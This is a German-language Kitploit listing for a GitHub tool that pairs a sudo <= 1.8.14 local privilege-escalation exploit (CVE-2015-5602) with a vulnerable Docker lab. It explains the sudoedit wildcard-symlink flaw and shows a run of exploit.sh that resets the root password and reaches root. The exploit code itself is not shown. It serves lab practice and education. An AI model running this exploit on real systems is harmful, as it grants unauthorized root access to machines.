Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
privesc-CVE-2015-5602 — Sudo <= 1.8.14 Lokale Rechteausweitung und verwundbarer Container | Kitploit
Tools/GitHubGitHub/t0kx/privesc-cve-2015-5602
Privilege EscalationContainer-SicherheitSchwachstellenanalyseExploitationLernen & BildungLabs & Praxis
GitHubt0kx/privesc-cve-2015-5602

privesc-CVE-2015-5602

Sudo <= 1.8.14 Lokale Rechteausweitung und verwundbarer Container

Repository anzeigen
15223vor 8 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Sudo <=1.8.14 Lokale Privilegienerweiterung

Sudo (su „do") ermöglicht einem Systemadministrator, bestimmten Benutzern (oder Benutzergruppen) die Möglichkeit zu geben, einige (oder alle) Befehle als root auszuführen, während alle Befehle und Argumente protokolliert werden.

Verwundbare Umgebung

Um eine verwundbare Umgebung für Ihren Test einzurichten, benötigen Sie Docker installiert und führen einfach den folgenden Befehl aus:

root@kitploit:~
docker build -t privesc/cve-2015-5602 .
docker run --rm -it privesc/cve-2015-5602

Und es wird eine interaktive Shell mit niedrigen Benutzerrechten gestartet.

Verwundbarer Code

Der Fehler wurde in sudoedit gefunden, das den vollständigen Pfad nicht überprüft, wenn ein Platzhalter zweimal verwendet wird (z. B. /home/*/*/esc.txt). Dies ermöglicht einem böswilligen Benutzer, die eigentliche Datei esc.txt durch einen symbolischen Link auf einen anderen Speicherort (z. B. /etc/shadow) zu ersetzen.

Ein erfolgreicher Exploit dieses Problems kann es einem Angreifer ermöglichen, Dateien zu manipulieren und durch Symlink-Angriffe Root-Rechte auf dem Hostsystem zu erlangen.

Exploit

Um dieses Ziel auszunutzen, führen Sie einfach Folgendes aus:

root@kitploit:~
./exploit.sh

Wenn Sie dieses verwundbare Image verwenden, können Sie einfach Folgendes ausführen:

root@kitploit:~
user@1cc9cd901b07:~$ sudo -l
User user may run the following commands on 1cc9cd901b07:
    (root) NOPASSWD: sudoedit /home/*/*/esc.txt
user@1cc9cd901b07:~$ ./exploit.sh 
[+] CVE-2015-5602 exploit by t0kx
[+] Creating folder...
[+] Creating symlink
[+] Modify EDITOR...
[+] Change root password to: d03c09dc34c53657aff1f459a86b20ed
[+] Done
user@1cc9cd901b07:~$ su
Password: 
root@1cc9cd901b07:/home/user# id
uid=0(root) gid=0(root) groups=0(root)
root@1cc9cd901b07:/home/user#

Credits

Diese Schwachstelle wurde von Daniel Svartman entdeckt.

Haftungsausschluss

Dieses oder frühere Programm dient NUR zu Bildungszwecken. Verwenden Sie es nicht ohne Erlaubnis. Der übliche Haftungsausschluss gilt, insbesondere die Tatsache, dass ich (t0kx) nicht für Schäden haftbar bin, die durch direkte oder indirekte Nutzung der von diesen Programmen bereitgestellten Informationen oder Funktionen verursacht werden. Der Autor oder irgendein Internetanbieter übernimmt KEINE Verantwortung für den Inhalt oder die missbräuchliche Verwendung dieser Programme oder deren Abkömmlinge. Durch die Nutzung dieser Programme akzeptieren Sie die Tatsache, dass jegliche Schäden (Datenverlust, Systemabsturz, Systemkompromittierung usw.), die durch die Nutzung dieser Programme verursacht werden, nicht in der Verantwortung von t0kx liegen.

Tool herunterladen